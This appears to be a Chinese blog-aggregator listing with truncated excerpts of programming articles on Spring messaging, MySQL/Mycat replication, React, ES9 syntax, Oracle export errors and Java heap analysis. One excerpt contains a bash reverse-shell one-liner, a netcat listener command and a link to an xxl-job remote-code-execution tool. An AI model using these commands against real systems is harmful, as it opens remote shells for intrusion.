0概述spring-messaging模块为集成messagingapi和消息协议提供支持。其代码结构为:其中base定义了消息Message(MessageHeader和body)、消息处理MessageHandler、发送消息MessageChannel。1.base模块其结构如下所示:其中:message由两部分组成,MessageHandler是一个处理消息的约定,springmessag
分类:
编程语言 时间:
2020-12-03 11:52:47
阅读次数:
8
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
1 !/bin/bash 2 3 4 HOSTNAME="localhost" 5 PORT="3306" 6 USERNAME="root" 7 PASSWORD="1234" 8 DBNAME="mydatabase" 9 10 11 LOGIN_CMD="mysql -h${HOSTNAME} ...
分类:
数据库 时间:
2020-12-02 12:27:59
阅读次数:
12
/** * 获取 url 里面的参数 * @param {string} url * @returns {Object} */ export function getQueryObject(url) { url = url == null ? window.location.href : url c ...
分类:
Web程序 时间:
2020-12-02 12:16:31
阅读次数:
13
Mysql+Mycat实现数据库主从同步与读写分离收录于话题#MySQL从入门到放弃26个此文章源于浅谈MySQL集群高可用架构对文章中的架构扩展介绍,之前写过一篇关于MHA的文章MySQL集群高可用架构之MHAMycat介绍官网:http://mycat.io/电子书:http://mycat.io/document/Mycat_V1.6.0.pdf书:http://blog.csdn.net/
分类:
数据库 时间:
2020-12-02 11:56:41
阅读次数:
11
super super(props): Superclass will help you to keep the props:[^ props] import React, { Component } from "react"; export default class App extends Co ...
分类:
其他好文 时间:
2020-12-01 12:16:33
阅读次数:
4
Rest 参数与 spread 扩展运算符在ES6中已经引入,不过ES6只针对于数组。 在ES9中为对象提供了像数组一样的 rest 参数和 扩展运算符 1. 输出 function connect({host,port,userName,password}){ console.log(host) ...
分类:
其他好文 时间:
2020-12-01 12:09:18
阅读次数:
6
今天做数据库导出报错:EXP-00091:Exportingquestionablestatistics.在对ORACLE数据库做exp备份导出时报EXP-00091:Exportingquestionablestatistics”错误:详情如下:EXP-00091:Exportingquestionablestatistics.EXP-00091:Exportingquestionablesta
分类:
数据库 时间:
2020-12-01 11:59:32
阅读次数:
11
简介 MAT 是Memory Analyzer的简称,他是一宽功能强大的Java堆内存分析器。多用于查找内存泄露以及查看内存消耗情况。 基于Eclipse开发,是一款免费的Java性能分析功能 下载安装 https://www.eclipse.org/mat/downloads.php 分析dump ...
分类:
编程语言 时间:
2020-11-30 16:10:09
阅读次数:
11
Vue+Ant design vue安装及配置使用 Ant design vue官网:https://www.antdv.com/docs/vue/introduce-cn/ 基于 Ant Design of Vue 实现的Vue项目 :https://gitee.com/sendya/ant-de ...
分类:
其他好文 时间:
2020-11-30 16:08:39
阅读次数:
7